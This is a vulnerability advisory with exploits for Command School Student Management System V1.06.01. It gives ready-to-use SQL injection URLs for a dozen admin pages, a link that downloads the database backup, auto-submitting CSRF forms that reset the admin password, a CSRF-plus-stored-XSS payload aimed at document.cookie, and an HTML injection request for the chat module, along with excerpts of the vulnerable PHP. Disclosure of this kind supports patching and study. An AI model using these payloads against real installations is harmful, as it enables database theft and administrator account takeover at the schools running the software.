Command School Student Management System V1.06.01 - Multiple Vulnerabilties ============================================================================ #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://sourceforge.net/projects/swifttide/ #################################################################### I. Multiple Sql Injection ############## VULNERABILITY ############## /admin_school_names.php ----------------------------------------------------------------------------- line (27): $action=get_param("action"); line (54-56) case "edit": $school_names_id=get_param("id"); $sSQL="SELECT school_names_desc FROM school_names WHERE school_names_id=$school_names_id"; note:[all Files same error] ----------------------------------------------------------------------------- ######### EXPLOIT ######### localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3 localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version() localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version() II. Backup Download ############## VULNERABILITY ############## /Backup/backup_ray2.php (LINE: 78-126) ----------------------------------------------------------------------------- // SET THE NAME OF THE BACKUP WITH A TIMESTAMP $bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt'; $fp = fopen($bkup, "w"); // GET THE LIST OF TABLES $sql = "SHOW TABLES"; $res = mysql_query($sql); if (!$res) die( mysql_error() ); if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" ); while ($s = mysql_fetch_array($res)) { $tables[] = $s[0]; } // ITERATE OVER THE LIST OF TABLES foreach ($tables as $table) { // WRITE THE DROP TABLE STATEMENT fwrite($fp,"DROP TABLE `$table`;\n"); // GET THE CREATE TABLE STATEMENT $res = mysql_query("SHOW CREATE TABLE `$table`"); if (!$res) die( mysql_error() ); $cre = mysql_fetch_array($res); $cre[1] .= ";"; $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE fwrite($fp, $txt . "\n"); // GET THE TABLE DATA $data = mysql_query("SELECT * FROM `$table`"); $num = mysql_num_fields($data); while ($row = mysql_fetch_array($data)) { // MAKE INSERT STATEMENTS FOR ALL THE VALUES $txt = "INSERT INTO `$table` VALUES("; for ($i=0; $i < $num; $i++) { $txt .= "'".mysql_real_escape_string($row[$i])."', "; } $txt = substr($txt, 0, -2); fwrite($fp, $txt . ");\n"); } } // ALL DONE fclose($fp); ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### <html> <title>Iphobos Blog</title> <label><a href="http://localhost/sw/backup/backup_ray2.php" class="button white">Backup Download</a></label> </html> III. Cross Site Request Forgery [Change Password Admin] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://localhost/sw/admin_change_password.php"> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="action" value="update" /> </form> </body> </html> IV. Cross Site Scripting [CSRF with XSS Exploit] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://localhost/sw/add_topic.php"> <input type="hidden" name="topic" value="<script>alert(document.cookie);</script>" /> <input type="hidden" name="detail" value="Iphobos Blog" /> <input type="hidden" name="Submit" value="Submit" /> </form> </body> </html> V. Html File Injection ############## VULNERABILITY ############## /chat/message.php (LINE: 4-12) ----------------------------------------------------------------------------- $f = fopen('msg.html',"a+"); } else { $f = fopen('msg.html',"w+"); } $nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden"; $msg = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : "."; $line = "<p><span class=\"name\">$nick: </span><span class=\"txt\">$msg</span></p>"; fwrite($f,$line."\r\n"); fclose($f); ----------------------------------------------------------------------------- ######### EXPLOIT ######### localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG After Exploit Go To localhost/sw/chat/msg.html you will find the injection information ####################################################################